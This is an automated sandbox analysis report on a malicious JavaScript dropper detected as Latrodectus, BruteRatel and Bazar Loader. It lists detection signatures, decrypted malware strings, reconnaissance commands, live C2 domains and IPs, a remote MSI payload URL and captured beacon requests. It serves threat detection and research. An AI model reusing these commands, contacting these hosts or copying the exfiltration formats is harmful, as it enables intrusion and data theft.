Windows Analysis Report
Document-18-33-08.js

Overview

General Information

Sample name: Document-18-33-08.js
Analysis ID: 1525184
MD5: c05645ed2ec3ff5c541b99d20011a488
SHA1: 6822c03f0781ac932c31747610f1fe1039f6861f
SHA256: a9a4640e3887e4ee71ae0e0624afa6b8fa6a22cdffd190f1d83234109dd8496d
Tags: BruteRatel, js, user-k3dg3___

Detection

Bazar Loader, BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sample has a suspicious name (potential lure to open the executable)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript installs MSI file from remote location
Checks for available system drives (often done to infect USB drives)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Name: Brute Ratel C4, BruteRatel
Description: Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Latrodectus, Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) malware.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

AV Detection

Source: 8.0.explorer.exe.3050000.0.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c ipconfig /all
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c systeminfo
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c nltest /domain_trusts
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c net view /all
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c net view /all /domain
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &ipconfig=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c net config workstation
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c whoami /groups
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &systeminfo=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &domain_trusts=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &domain_trusts_all=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_view_all_domain=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_view_all=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_group=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &wmic=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_config_ws=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_wmic_av=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &whoami_group=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "pid":
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%d",
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "proc":
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%s",
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "subproc": [
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &proclist=[
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "pid":
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%d",
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "proc":
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%s",
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "subproc": [
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &desklinks=[
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: *.*
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%s"
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Update_%x
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Custom_update
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: .dll
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: .exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Error
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: runnung
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %s/%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: front
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /files/
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Alpha
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Cookie:
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: POST
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: GET
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: curl/7.88.1
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: CLEARURL
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: URLS
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: COMMAND
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: ERROR
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: [{"data":"
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "}]
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &dpost=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: https://isomicrotich.com/test/
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: https://opewolumeras.com/test/
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: \*.dll
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: AppData
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Desktop
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Startup
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Personal
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Local AppData
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %s%d.dll
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: <!DOCTYPE
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Content-Length: 0
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: <html>
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Content-Type: application/dns-message
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Content-Type: application/ocsp-request
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: 12345
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: 12345
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &stiller=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %s%d.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %x%x
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &mac=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %02x
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: :%02x
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &computername=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &domain=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: LogonTrigger
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: \Registry\Machine\
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: TimeTrigger
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: PT0H%02dM
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: PT0S
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: \update_data.dat
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp, vierm_soft_x64.dll.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp File opened: c: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: a: Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FEAF79 FindFirstFileExW, 4_2_00FEAF79
Source: C:\Windows\explorer.exe Code function: 8_2_0305A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0305A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_03052B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_03052B28
Source: C:\Windows\explorer.exe Code function: 8_2_030604C0 FindFirstFileW, 8_2_030604C0

Networking

Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50053 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50048 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50050 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50051 -> 188.114.96.3:443
Source: C:\Windows\System32\rundll32.exe Network Connect: 82.115.223.39 8041 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 80.78.24.30 8041 Jump to behavior
Source: Malware configuration extractor URLs: https://isomicrotich.com/test/
Source: Malware configuration extractor URLs: https://opewolumeras.com/test/
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50052
Source: http://188.119.112.7/das.msi IID Installer: C:\Windows\System32\wscript.exe
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 80.78.24.30:8041
Source: global traffic TCP traffic: 192.168.2.5:49708 -> 82.115.223.39:8041
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 82.115.223.39 82.115.223.39
Source: Joe Sandbox View IP Address: 80.78.24.30 80.78.24.30
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: MIDNET-ASTK-TelecomRU MIDNET-ASTK-TelecomRU
Source: Joe Sandbox View ASN Name: CYBERDYNELR CYBERDYNELR
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected:
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 92
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFg9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 0
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFj9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 0
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFi9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 0
Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: C:\Windows\explorer.exe Code function: 8_2_03055078 InternetReadFile, 8_2_03055078
Source: global traffic HTTP traffic detected:
GET /das.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: 188.119.112.7
Source: global traffic DNS traffic detected: DNS query: bazarunet.com
Source: global traffic DNS traffic detected: DNS query: greshunka.com
Source: global traffic DNS traffic detected: DNS query: tiguanin.com
Source: global traffic DNS traffic detected: DNS query: isomicrotich.com
Source: unknown HTTP traffic detected:
POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 92
Cache-Control: no-cache
Source: wscript.exe, 00000000.00000002.2065296412.00000196D5AD6000.00000004.00000020.00020000.00000000.sdmp, Document-18-33-08.js String found in binary or memory: http://188.119.112.7/das.msi
Source: ~DFED22D1FE613BF34C.TMP.1.dr, ~DF07B80D9F27CBE04D.TMP.1.dr, ~DF01B5DC13092BA872.TMP.1.dr, ~DF28B4DE99F83A16D6.TMP.1.dr, ~DF59A0B4535E503852.TMP.1.dr, inprogressinstallinfo.ipi.1.dr String found in binary or memory: http://188.119.112.7/das.msi0
Source: ~DF93ACB531B807E54B.TMP.1.dr String found in binary or memory: http://188.119.112.7/das.msi1737443152311351380
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: explorer.exe, 00000008.00000002.3331052313.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
